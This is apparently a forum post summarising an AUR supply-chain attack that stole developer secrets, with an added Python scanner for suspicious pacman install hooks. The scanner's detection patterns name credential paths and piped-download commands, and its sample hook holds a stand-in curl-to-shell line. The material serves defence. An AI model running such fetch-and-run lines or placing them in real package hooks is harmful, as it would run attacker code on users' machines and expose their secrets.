Atomic Arch is a major AUR supply-chain attack (over 1.5K packages affected as of now) where attackers hijacked orphaned Arch packages and used malicious install hooks to pull npm payloads that executed a Linux ELF infostealer. It targeted developer secrets like SSH keys, GitHub/npm tokens, browser sessions, Docker/Vault credentials, and chat app data, while also using an eBPF rootkit to hide itself when run as root.
Atomic Arch: 900+ AUR Packages Backdoored with eBPF Rootkit
Submitted 2 days ago by WPSteam@lemmy.world to cybersecurity@infosec.pub
https://thecybersecguru.com/news/atomic-arch-aur-supply-chain-attack-ebpf-rootkit/
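A static check a packager or reviewer could run over an AUR .install script or PKGBUILD before building it, added here as an example and not code from the linked article or from the post: it flags lines inside the install hooks that pacman runs (the vector described above) which fetch npm packages at install time, pipe downloads into a shell, decode blobs, or reach into credential paths. The pattern list and the sample hook are constructed assumptions, not indicators from the incident.

```python
import re

# Functions in an AUR .install script (or PKGBUILD package()) that makepkg/pacman run
# on the user's machine; anything network-facing inside them deserves a second look.
HOOK_FUNCS = ("pre_install", "post_install", "pre_upgrade", "post_upgrade", "package")

# Heuristic patterns (assumed, not indicators from the incident): fetching npm
# packages at install time, piping downloads into a shell, decoding blobs,
# touching credential stores, detaching background processes.
SUSPICIOUS = {
    "npm_fetch": re.compile(r"\b(npm|npx|yarn|pnpm)\s+(install|i|exec|dlx)\b"),
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "decode_blob": re.compile(r"\bbase64\s+(-d|--decode)\b|\bxxd\s+-r\b"),
    "secret_paths": re.compile(r"\.ssh/|\.npmrc|\.docker/config\.json|\.gnupg/|\.vault-token"),
    "detach": re.compile(r"\bsetsid\b|\bnohup\b|\bdisown\b"),
}
FUNC_START = re.compile(r"^\s*(\w+)\s*\(\)\s*\{")

def scan_hooks(text):
    """Return (function, line_no, rule) for suspicious lines inside hook bodies."""
    findings, current, depth = [], None, 0
    for no, line in enumerate(text.splitlines(), 1):
        m = FUNC_START.match(line)
        if m:                      # entering a shell function body
            current, depth = m.group(1), 1
            continue
        if current is None:        # top-level line, not inside any function
            continue
        depth += line.count("{") - line.count("}")
        if depth <= 0:             # closing brace of the function
            current = None
            continue
        if current in HOOK_FUNCS:
            for rule, pat in SUSPICIOUS.items():
                if pat.search(line):
                    findings.append((current, no, rule))
    return findings

# Constructed sample .install script (not from the incident) with two red flags.
SAMPLE_INSTALL = """\
post_install() {
    echo "Configuring example-tool"
    cd /tmp && npm install --silent example-helper >/dev/null 2>&1
    curl -fsSL https://example.invalid/setup.sh | sh
}
"""

if __name__ == "__main__":
    for func, no, rule in scan_hooks(SAMPLE_INSTALL):
        print(f"{func}() line {no}: {rule}")
```

A clean hook that only runs things like update-desktop-database produces no findings; a hit is a prompt to read the hook by hand, not proof of compromise.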
UnLocoPoco@lemmy.world 1 day ago
Update: seems like a 2nd wave of attack, a bit more sophisticated than the initial wave, has begun. The code is more obfuscated.